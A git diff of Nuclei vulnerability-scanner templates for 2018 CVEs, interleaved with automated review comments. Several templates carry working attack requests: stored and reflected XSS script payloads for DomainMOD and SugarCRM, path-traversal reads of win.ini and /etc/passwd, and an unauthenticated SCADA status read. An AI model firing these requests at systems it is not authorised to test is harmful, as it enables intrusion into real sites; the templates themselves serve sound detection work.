- severity: medium
- description: |
- DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
- reference:
- - https://www.exploit-db.com/exploits/45959
- - https://github.com/domainmod/domainmod/issues/85
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 4.8
- cve-id: CVE-2018-19892
- cwe-id: CWE-79
- metadata:
- verified: "true"
- tags: cve,cve2018,domainmod,xss,authenticated
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- new_username={{username}}&new_password={{password}}
- - |
- POST /admin/dw/add-server.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
- - |
- GET /admin/dw/servers.php HTTP/1.1
- Host: {{Hostname}}
- cookie-reuse: true
- redirects: true
- max-redirects: 3
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '">'
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml
new file mode 100644
index 0000000000..f74e59b810
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml
@@ -0,0 +1,46 @@
+id: CVE-2018-19914
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
+ reference:
+ - https://www.exploit-db.com/exploits/46375/
+ - https://github.com/domainmod/domainmod/issues/87
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19914
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/dns.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+ - |
+ GET /assets/dns.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml
new file mode 100644
index 0000000000..f397373f28
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml
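Review bot: The POST places two different payloads — `alert(document.domain)` in `new_name` and `alert(1)` in `new_notes` — but the DSL has a single `contains(body_3, …)` (rendered here as `">"`, presumably one of the two scripts), so the notes field named in the description is written to the target and never verified; either add a second `contains(body_3, …)` for the notes payload or drop it from the request. `verified: "true"` is a quoted string while CVE-2018-19915, added alongside it, writes `verified: true`; both load, but the catalog then carries two types for the same flag — use the boolean. The stored payload is not removed after the check, so `intrusive` should be added to `tags`.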
@@ -0,0 +1,47 @@
+id: CVE-2018-19915
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through 4.11.01 has XSS via the assets/edit/host.php Web Host Name or Web Host URL field.
+ reference:
+ - https://github.com/domainmod/domainmod/issues/87
+ - https://www.exploit-db.com/exploits/46376/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19915
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19915
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/host.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test
+ - |
+ GET /assets/hosting.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml
deleted file mode 100644
index e6a0801a38..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml
+++ /dev/null
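Review bot: The description says the XSS is in `assets/edit/host.php` but the request posts to `/assets/add/host.php`, so the two disagree; the NVD entry referenced in the template should settle which page is meant — if it is the add form, change the description to `assets/add/host.php`, otherwise the request is exercising a different sink than the one documented. Both `new_host` and `new_url` carry the payload but the DSL has a single `contains(body_3, …)`, so a page that encodes one field and not the other still reads as a full hit; document which sink the match proves, or check for both. The same issue number (`domainmod/issues/87`) is referenced by CVE-2018-19914 in this commit — presumably one of the two is a copy-paste, confirm. As with the other DomainMOD templates here, the stored payload is left behind, so add `intrusive` to `tags`.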
@@ -1,47 +0,0 @@
-id: CVE-2018-20009
-info:
- name: DomainMOD 4.11.01 - Cross-Site Scripting
- author: arafatansari
- severity: medium
- description: |
- DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider.php ssl-provider-name, ssl-provider's-url parameters.
- reference:
- - https://github.com/domainmod/domainmod/issues/88
- - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
- - https://www.exploit-db.com/exploits/46372/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 4.8
- cve-id: CVE-2018-20009
- cwe-id: CWE-79
- metadata:
- verified: true
- tags: cve,cve2018,domainmod,xss,authenticated
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- new_username={{username}}&new_password={{password}}
- - |
- POST /assets/add/ssl-provider.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
- - |
- GET /assets/ssl-providers.php HTTP/1.1
- Host: {{Hostname}}
- cookie-reuse: true
- redirects: true
- max-redirects: 2
- req-condition: true
- matchers:
- - type: dsl
- dsl:
- - 'status_code_3 == 200'
- - 'contains(all_headers_3, "text/html")'
- - 'contains(body_3, ">")'
- condition: and
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml
deleted file mode 100644
index ca5de31180..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml
+++ /dev/null
@@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-20985.yaml b/nuclei-templates/CVE-2018/CVE-2018-20985.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-20985.yaml rename to nuclei-templates/CVE-2018/CVE-2018-20985.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-2628.yaml b/nuclei-templates/CVE-2018/CVE-2018-2628.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2628.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2628.yaml 
diff --git a/nuclei-templates/CVE-2018/cve-2018-3714.yaml b/nuclei-templates/CVE-2018/CVE-2018-3714.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3714.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3714.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3760.yaml b/nuclei-templates/CVE-2018/CVE-2018-3760.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3760.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3760.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3810.yaml b/nuclei-templates/CVE-2018/CVE-2018-3810.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3810.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3810.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml deleted file mode 100644 index fc043311e1..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-5715 -info: - name: SugarCRM 3.5.1 - Reflected XSS - author: edoardottt - severity: medium - description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable). - reference: - - https://www.exploit-db.com/exploits/43683 - - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 - - https://m4k4br0.github.io/sugarcrm-xss/ - - https://www.exploit-db.com/exploits/43683/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-5715 - cwe-id: CWE-79 - metadata: - google-dork: intext:"SugarCRM Inc. All Rights Reserved" - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: cve,cve2018,sugarcrm,xss -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&"/>=&"><< Back

' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-6008.yaml b/nuclei-templates/CVE-2018/CVE-2018-6008.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6008.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6008.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-6200.yaml b/nuclei-templates/CVE-2018/CVE-2018-6200.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6200.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6200.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7422.yaml b/nuclei-templates/CVE-2018/CVE-2018-7422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7422.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7422.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7490.yaml b/nuclei-templates/CVE-2018/CVE-2018-7490.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7490.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7490.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7662.yaml b/nuclei-templates/CVE-2018/CVE-2018-7662.yaml deleted file mode 100644 index eb56470249..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7662.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2018-7662 - -info: - name: CouchCMS Full Path Disclosure - author: ritikchaddha - severity: medium - description: phpmailer.php and mysql2i.func.php disclosure the full path - reference: https://github.com/CouchCMS/CouchCMS/issues/46 - tags: couchcms,fpd,cve,cve2018 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-7662 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - - "{{BaseURL}}/addons/phpmailer/phpmailer.php" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - "mysql2i.func.php on line 10" - - "Fatal error: Cannot redeclare mysql_affected_rows() in" - condition: and - - - type: word - part: body - words: - - "phpmailer.php on line 10" - - "Fatal error: Call to a menber function add_event_listener() on a non-object in" - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-9118.yaml b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9118.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9118.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml new file mode 100644 index 0000000000..954d32e9fb --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml 
@@ -0,0 +1,61 @@
+id: CVE-2018-1000856
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.
+ reference:
+ - https://github.com/domainmod/domainmod/issues/80
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-1000856
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+
+requests:
+ - raw:
+
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /segments/add.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
+
+ - |
+ GET /segments/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ cookie-reuse: true
+ host-redirects: true
+ max-redirects: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml b/nuclei-templates/CVE-2018/cve-2018-1000861.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-1000861.yaml
rename to nuclei-templates/CVE-2018/cve-2018-1000861.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-10562.yaml b/nuclei-templates/CVE-2018/cve-2018-10562.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-10562.yaml
rename to nuclei-templates/CVE-2018/cve-2018-10562.yaml
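Review bot: The body matcher `words: - ""` is an empty string, which every response contains, so together with the `text/html` and status-200 matchers it fires on any rendered page, including the login form a failed authentication redirects to; it should carry the payload that was submitted, `- "<script>alert(1)</script>"` (the empty value may be an artefact of tag stripping, but the hunk as posted cannot detect the reflection at all). The third request sends `Content-Type: application/x-www-form-urlencoded` on a bodyless GET, which can be dropped. `verified: "true"` is a quoted string here while the sibling DomainMOD templates added in this commit use the bare boolean; pick one form for the directory.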
diff --git a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml b/nuclei-templates/CVE-2018/cve-2018-10956.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-10956.yaml rename to nuclei-templates/CVE-2018/cve-2018-10956.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml b/nuclei-templates/CVE-2018/cve-2018-11709.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11709.yaml rename to nuclei-templates/CVE-2018/cve-2018-11709.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/cve-2018-11784.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11784.yaml rename to nuclei-templates/CVE-2018/cve-2018-11784.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/cve-2018-12300.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12300.yaml rename to nuclei-templates/CVE-2018/cve-2018-12300.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/cve-2018-12613.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12613.yaml rename to nuclei-templates/CVE-2018/cve-2018-12613.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml b/nuclei-templates/CVE-2018/cve-2018-12675.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12675.yaml rename to nuclei-templates/CVE-2018/cve-2018-12675.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1271.yaml b/nuclei-templates/CVE-2018/cve-2018-1271.yaml new file mode 100644 index 0000000000..ccf03eab13 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1271.yaml 
@@ -0,0 +1,28 @@
+id: CVE-2018-1271
+
+info:
+ name: Spring MVC Directory Traversal Vulnerability
+ author: hetroublemakr
+ severity: medium
+ reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.90
+ cve-id: CVE-2018-1271
+ cwe-id: CWE-22
+ description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'for 16-bit app support'
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/CVE-2018-13380.yaml b/nuclei-templates/CVE-2018/cve-2018-13380.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-13380.yaml
rename to nuclei-templates/CVE-2018/cve-2018-13380.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-14931.yaml b/nuclei-templates/CVE-2018/cve-2018-14931.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-14931.yaml
rename to nuclei-templates/CVE-2018/cve-2018-14931.yaml
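Review bot: The `info` block has no `tags:` line, so unlike every other template added in this commit the file is invisible to tag-based selection such as `-tags cve,cve2018`; add something like `tags: cve,cve2018,spring,lfi` under `info`, following whatever the repository uses for its other traversal templates. `reference` is a single scalar pointing at a blog post with no NVD entry, whereas the sibling templates use a list that includes `https://nvd.nist.gov/vuln/detail/<id>`; converting it to a list with the NVD link keeps the metadata uniform. The `description` sits after `classification`; moving it up next to `name`/`severity` matches the layout of the other files in the directory.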
diff --git a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml b/nuclei-templates/CVE-2018/cve-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-15745.yaml rename to nuclei-templates/CVE-2018/cve-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16299.yaml b/nuclei-templates/CVE-2018/cve-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16299.yaml rename to nuclei-templates/CVE-2018/cve-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16670.yaml b/nuclei-templates/CVE-2018/cve-2018-16670.yaml deleted file mode 100644 index bf69edf1c7..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-16670.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-16670 - -info: - name: CirCarLife SCADA PLC Status - author: geeknik - severity: medium - description: PLC status disclosure due to lack of authentication - reference: - - https://www.exploit-db.com/exploits/45384 - - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life - - https://www.exploit-db.com/exploits/45384/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-16670 - cwe-id: CWE-287 - tags: cve,cve2018,circarlife,scada,plc,iot,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/services/user/values.xml?var=STATUS" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - part: body - words: - - "" - - "Reader.STATUS" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml b/nuclei-templates/CVE-2018/cve-2018-18570.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18570.yaml rename to nuclei-templates/CVE-2018/cve-2018-18570.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/cve-2018-18778.yaml new file mode 100644 index 0000000000..a26da58807 --- /dev/null 
+++ b/nuclei-templates/CVE-2018/cve-2018-18778.yaml
@@ -0,0 +1,31 @@
+id: CVE-2018-18778
+
+info:
+ name: mini_httpd Path Traversal
+ author: dhiyaneshDK
+ severity: medium
+ description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
+ reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2018-18778
+ cwe-id: CWE-200
+
+requests:
+ - raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host:
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19386.yaml b/nuclei-templates/CVE-2018/cve-2018-19386.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-19386.yaml
rename to nuclei-templates/CVE-2018/cve-2018-19386.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19439.yaml b/nuclei-templates/CVE-2018/cve-2018-19439.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-19439.yaml
rename to nuclei-templates/CVE-2018/cve-2018-19439.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19458.yaml b/nuclei-templates/CVE-2018/cve-2018-19458.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-19458.yaml
rename to nuclei-templates/CVE-2018/cve-2018-19458.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-19751.yaml b/nuclei-templates/CVE-2018/cve-2018-19751.yaml
deleted file mode 100644
index 7a50117796..0000000000
--- a/nuclei-templates/CVE-2018/cve-2018-19751.yaml
+++ /dev/null
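Review bot: The blank `Host:` header in the raw request reads like a mistake, yet the request is otherwise a plain `GET /etc/passwd` with `unsafe: true` and `|+` keeping the trailing blank line, which suggests the empty header is the deliberate trigger; nothing in the file says so, and a maintainer normalising it to `Host: {{Hostname}}` would silently neutralise the check. Add a comment above the request such as `# Host is intentionally empty; unsafe: true sends the raw request verbatim -- confirm against the advisory` so the intent survives. The file also lacks a `tags:` line and its `reference` is a single scalar without the NVD entry, unlike the neighbouring templates; `tags: cve,cve2018,mini_httpd,lfi` and a list containing `https://nvd.nist.gov/vuln/detail/CVE-2018-18778` would bring it in line.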
@@ -1,62 +0,0 @@ -id: CVE-2018-19751 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. - reference: - - https://www.exploit-db.com/exploits/45947/ - - https://github.com/domainmod/domainmod/issues/83 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19751 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/ssl-fields/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test - - - | - GET /admin/ssl-fields/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19752.yaml b/nuclei-templates/CVE-2018/cve-2018-19752.yaml deleted file mode 100644 index 0466e46689..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19752.yaml +++ /dev/null 
@@ -1,61 +0,0 @@ -id: CVE-2018-19752 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - reference: - - https://github.com/domainmod/domainmod/issues/84 - - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19752 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/registrar.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test - - - | - GET /assets/registrars.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19892.yaml b/nuclei-templates/CVE-2018/cve-2018-19892.yaml new file mode 100644 index 0000000000..f310b4f7f4 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19892.yaml 
@@ -0,0 +1,61 @@
+id: CVE-2018-19892
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
+ reference:
+ - https://www.exploit-db.com/exploits/45959
+ - https://github.com/domainmod/domainmod/issues/85
